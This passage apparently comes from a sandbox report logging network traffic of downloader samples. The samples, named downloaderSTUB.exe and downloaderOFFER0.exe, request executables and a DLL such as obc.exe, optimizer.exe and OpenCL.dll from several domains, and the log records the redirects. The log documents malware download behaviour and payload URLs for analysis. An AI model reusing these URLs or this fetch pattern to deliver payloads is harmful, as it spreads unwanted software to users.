    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.1 302 Found
    Date: Mon, 25 Dec 2023 11:01:07 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 113
    Connection: close
    Location: http://www.google.com/enterprise/apps/business/products.html/DirectDownloaderInstaller.exe
    X-Served-By: Namecheap URL Forward
    Server: namecheap-nginx
  • flag-us
    GET
    http://www.directdownloader.com/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    162.255.119.249:80
    Request
    GET /toolbars/optimizer.exe HTTP/1.0
    Host: www.directdownloader.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.1 302 Found
    Date: Mon, 25 Dec 2023 11:01:04 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 106
    Connection: close
    Location: http://www.google.com/enterprise/apps/business/products.html/toolbars/optimizer.exe
    X-Served-By: Namecheap URL Forward
    Server: namecheap-nginx
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:04 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:07 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-us
    DNS
    www.google.com
    downloaderOFFER0.exe
    Remote address:
    8.8.8.8:53
    Request
    www.google.com
    IN A
    Response
    www.google.com
    IN A
    142.250.200.4
  • flag-gb
    GET
    http://www.google.com/enterprise/apps/business/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    142.250.200.4:80
    Request
    GET /enterprise/apps/business/products.html/toolbars/optimizer.exe HTTP/1.0
    Host: www.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://enterprise.google.com/apps/business/products.html/toolbars/optimizer.exe
    Cross-Origin-Resource-Policy: cross-origin
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 277
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:34 GMT
    Expires: Mon, 25 Dec 2023 11:29:34 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 90
  • flag-gb
    GET
    http://enterprise.google.com/apps/business/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    142.250.200.46:80
    Request
    GET /apps/business/products.html/toolbars/optimizer.exe HTTP/1.0
    Host: enterprise.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://gsuite.google.com/products.html/toolbars/optimizer.exe
    Cross-Origin-Resource-Policy: cross-origin
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 259
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:35 GMT
    Expires: Mon, 25 Dec 2023 11:29:35 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 89
  • flag-gb
    GET
    http://gsuite.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    216.58.213.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: gsuite.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:35 GMT
    Expires: Mon, 25 Dec 2023 11:29:35 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 93
  • flag-gb
    GET
    http://www.google.com/enterprise/apps/business/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    142.250.200.4:80
    Request
    GET /enterprise/apps/business/products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: www.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://enterprise.google.com/apps/business/products.html/DirectDownloaderInstaller.exe
    Cross-Origin-Resource-Policy: cross-origin
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 284
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:34 GMT
    Expires: Mon, 25 Dec 2023 11:29:34 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 93
  • flag-gb
    GET
    http://enterprise.google.com/apps/business/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    142.250.200.46:80
    Request
    GET /apps/business/products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: enterprise.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://gsuite.google.com/products.html/DirectDownloaderInstaller.exe
    Cross-Origin-Resource-Policy: cross-origin
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 266
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:35 GMT
    Expires: Mon, 25 Dec 2023 11:29:35 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 92
  • flag-gb
    GET
    http://gsuite.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    216.58.213.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: gsuite.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:35 GMT
    Expires: Mon, 25 Dec 2023 11:29:35 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 95
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:08 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:08 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 91
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:08 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 100
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:08 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:08 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:08 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:12 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 94
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 94
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 94
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 94
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 98
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:12 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:12 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:13 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:13 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:13 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:13 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:13 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:14 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:14 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:14 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:14 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:14 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:14 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:14 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:14 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
